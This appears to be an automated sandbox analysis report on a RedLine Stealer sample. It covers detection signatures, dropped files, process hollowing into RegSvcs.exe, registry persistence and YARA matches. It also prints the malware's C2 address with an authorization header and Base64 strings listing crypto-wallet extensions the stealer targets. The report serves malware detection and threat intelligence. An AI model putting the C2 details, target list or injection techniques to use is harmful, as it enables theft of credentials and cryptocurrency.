Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	834226
MD5:	308d76f827d8624c5c933a5119569b5e
SHA1:	e896674ff83456092db4763c8b02537ec5f60296
SHA256:	c42840af07ce02effd645b993cbee380d20e097ed2bd1e68468624766b0601b2
Tags:	exe
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Creates an autostart registry key pointing to binary in C:\Windows

Writes to foreign memory regions

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

AV process strings found (often used to terminate AV products)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

File is packed with WinRar

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

file.exe (PID: 6364 cmdline: C:\Users\user\Desktop\file.exe MD5: 308D76F827D8624C5C933A5119569B5E)

123.exe (PID: 2356 cmdline: "C:\Windows\Temp\123.exe" MD5: 3D8A270AF27D26831957D97353600B05)

RegSvcs.exe (PID: 1176 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

WerFault.exe (PID: 5216 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 8 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 236 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

321.exe (PID: 3776 cmdline: "C:\Windows\Temp\321.exe" MD5: 3E4A296272D9389DB0A87A3723512815)

RegSvcs.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

WerFault.exe (PID: 6648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 216 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html https://blog.avast.com/adobe-acrobat-sign-malware	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["51.210.161.21:36108"], "Authorization Header": "c2955ed3813a798683a185a82e949f88"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.514026259.0000000000802000.00000020.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000003.254290933.0000000001082000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.800000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.RegSvcs.exe.800000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a4cc:$pat14: , CommandLine: 0x134ab:$v2_1: ListOfProcesses 0x1328a:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b6d:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x120a2:$v4_8: procName 0x1281d:$v5_5: FileScanning 0x11d76:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.2.123.exe.92ca60.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.123.exe.92ca60.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x188cc:$pat14: , CommandLine: 0x118ab:$v2_1: ListOfProcesses 0x1168a:$v4_3: base64str 0x12203:$v4_4: stringKey 0xff6d:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x104a2:$v4_8: procName 0x10c1d:$v5_5: FileScanning 0x10176:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.3.123.exe.1080000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.123.exe.1080000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a4cc:$pat14: , CommandLine: 0x134ab:$v2_1: ListOfProcesses 0x1328a:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b6d:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x120a2:$v4_8: procName 0x1281d:$v5_5: FileScanning 0x11d76:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.2.123.exe.92ca60.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.123.exe.92ca60.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a4cc:$pat14: , CommandLine: 0x134ab:$v2_1: ListOfProcesses 0x1328a:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b6d:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x120a2:$v4_8: procName 0x1281d:$v5_5: FileScanning 0x11d76:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.2.123.exe.900000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.123.exe.900000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1ddc8:$s5: delete[] 0x4592c:$pat14: , CommandLine: 0x3e90b:$v2_1: ListOfProcesses 0x3e6ea:$v4_3: base64str 0x3f263:$v4_4: stringKey 0x3cfcd:$v4_5: BytesToStringConverted 0x3c1d6:$v4_6: FromBase64 0x3d502:$v4_8: procName 0x3dc7d:$v5_5: FileScanning 0x3d1d6:$v5_7: RecordHeaderField 0x3ce94:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Click to see the 5 entries

Code function: 1_2_009587E1 CreateProcessW,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAlloc,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

1_2_009587E1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A36FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00A36FAA

Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: file.exe

Static PE information: invalid certificate

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\re.exe 53D0BC467AAD4AC95C9655617B34E3859D0BEBA1D80167B4E8A697AA0FEC0B3B

Source: re.exe.8.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 123.exe.0.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_TLS size: 0x100 address: 0x0
Source: 321.exe.0.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_TLS size: 0x100 address: 0x0

Source: file.exe	ReversingLabs: Detection: 29%
Source: file.exe	Virustotal: Detection: 29%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Temp\123.exe "C:\Windows\Temp\123.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Temp\321.exe "C:\Windows\Temp\321.exe"
Source: C:\Windows\Temp\123.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 8
Source: C:\Windows\Temp\123.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 236
Source: C:\Windows\Temp\321.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Temp\321.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 216
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Temp\123.exe "C:\Windows\Temp\123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Temp\321.exe "C:\Windows\Temp\321.exe"	Jump to behavior
Source: C:\Windows\Temp\123.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Temp\321.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Temp\__tmp_rar_sfx_access_check_5981953

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/19@2/4

Source: C:\Users\user\Desktop\file.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A36C74 GetLastError,FormatMessageW,

0_2_00A36C74

Source: 1.3.123.exe.1080000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 3.2.RegSvcs.exe.800000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\SmartLoader401
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1176
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2356
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3776

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A4A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00A4A6C2

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: file.exe

Static file information: File size 1180505 > 1048576

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4EB78 push eax; ret	0_2_00A4EB96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4F640 push ecx; ret	0_2_00A4F653
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00901CDA push eax; ret	1_2_00901EC8
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0092D161 push es; ret	1_2_0092D1A1
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0090554B push ecx; ret	1_2_0090555E

Source: file.exe	Static PE information: section name: .didat
Source: 123.exe.0.dr	Static PE information: section name: .anoth
Source: 321.exe.0.dr	Static PE information: section name: .anoth

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Temp\__tmp_rar_sfx_access_check_5981953

Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.038368167533408

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\re.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Temp\321.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Temp\123.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Temp\321.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Temp\123.exe			Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

